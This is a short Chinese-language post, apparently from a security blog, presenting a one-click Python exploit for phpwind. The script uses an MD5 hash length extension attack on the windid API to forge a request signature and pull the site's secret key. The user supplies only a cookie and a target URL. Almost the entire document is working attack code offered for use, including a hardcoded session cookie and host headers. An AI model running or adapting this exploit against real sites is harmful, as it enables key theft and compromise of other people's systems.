利用md5 length extension attack,具体分析文章:https://www.leavesongs.com/PENETRATION/phpwind-hash-length-extension-attack.html

phpwind获得secretkey一键化脚本，填写一下cookie和url就可以获得secretkey

#coding=utf-8
import urllib
import urllib2
import time
import cookielib
import gzip
import StringIO
from bs4 import BeautifulSoup
import re
import hashpumpy
import sys
reload(sys)
sys.setdefaultencoding('utf-8')

def get_key(url):
    url = url + '/?m=profile&c=avatar&_left=avatar'
    response = opener.open(url)
    html = response.read()
    if response.info().get('Content-Encoding') == 'gzip':
        stream = StringIO.StringIO(html)
        with gzip.GzipFile(fileobj=stream) as f:
            html = f.read()

    soup = BeautifulSoup(html, 'lxml')
    key_url = soup.find('param',attrs={'name':'FlashVars'}).get('value')
    key_url = urllib.unquote(key_url)
    rule = 'uid=(.+?)&windidkey=(.+?)&time=(.+?)&clientid=(.+?)&type'
    Pattern = re.compile(rule, re.S)
    rs = re.findall(Pattern, key_url)
    return rs[0]

def padding_exten(windidkey,time,uid):
    hexdigest = windidkey
    original_data = time+'adoAvatarcavatarmapitypeflashuid'+uid+'uidundefined'
    data_to_add = 'alistcappmapi'
    key_length = 32    
    result = list()
    rs = hashpumpy.hashpump(hexdigest,original_data,data_to_add,key_length)
    result.append(rs[0])

    tmp = str(rs)
    tmp = tmp.split(',')[1]
    tmp = tmp.split("\'")[1]
    tmp = tmp.replace('\\x','%')   
    rule = 'undefined(.+?)alist'
    Pattern = re.compile(rule, re.S)
    tmp = re.findall(Pattern, tmp)
    result.append(tmp[0]) 
    return result


if __name__ == '__main__':
    url = 'http://192.168.0.100/phpwind'
    cookie = 'CNZZDATA1257835621=169451052-1472798292-null%7C1472798292; PHPSESSID=5adaadb063b4208acd574d3d044dda38; ECS[visit_times]=5; csrf_token=ab686222777d7f80; xzr_winduser=PbUcCS1OT1ZjCzY8GoJOV8EOvix9OdGpc%2BmWBPYV6ar07B7AZSOhSw%3D%3D; xzr_lastvisit=7%091475751418%09%2Fphpwind%2F%3Fm%3Dprofile%26c%3Davatar%26_left%3Davatar; xzr_visitor=cx59FPbNJ4FYG2e9cWKpUP%2FTZTef7Yu4DTFLTftwwZ%2FPEVo8'
    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    opener.addheaders.append(
        ('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0'))
    opener.addheaders.append(('Accept', '*/*'))
    opener.addheaders.append(('Accept-Language', 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3'))
    opener.addheaders.append(('Accept-Encoding', 'gzip, deflate'))
    opener.addheaders.append(('Connection', 'keep-alive'))
    opener.addheaders.append(('Cookie', cookie))
    opener.addheaders.append(('Host', '106.75.33.217:5888'))
    opener.addheaders.append(('Referer', 'http://106.75.33.217:5888/rob.php?id=740'))
    opener.addheaders.append(('Cache-Control', 'max-age=0'))
    uid, windidkey, time, clientid = get_key(url)
    windidkey, padding = padding_exten(windidkey,time,uid)
    payload = '/windid/index.php?time='+time+'&windidkey='+windidkey+'&clientid='+clientid+'&adoAvatarcavatarmapitypeflashuid'+uid+'uidundefined='+padding
    url = url + payload

    data = {'m':'api','c':'app','a':'list'}
    data = urllib.urlencode(data)
    response = opener.open(url,data)
    html = response.read()

    if response.info().get('Content-Encoding') == 'gzip':
        stream = StringIO.StringIO(html)
        with gzip.GzipFile(fileobj=stream) as f:
            html = f.read()
    print html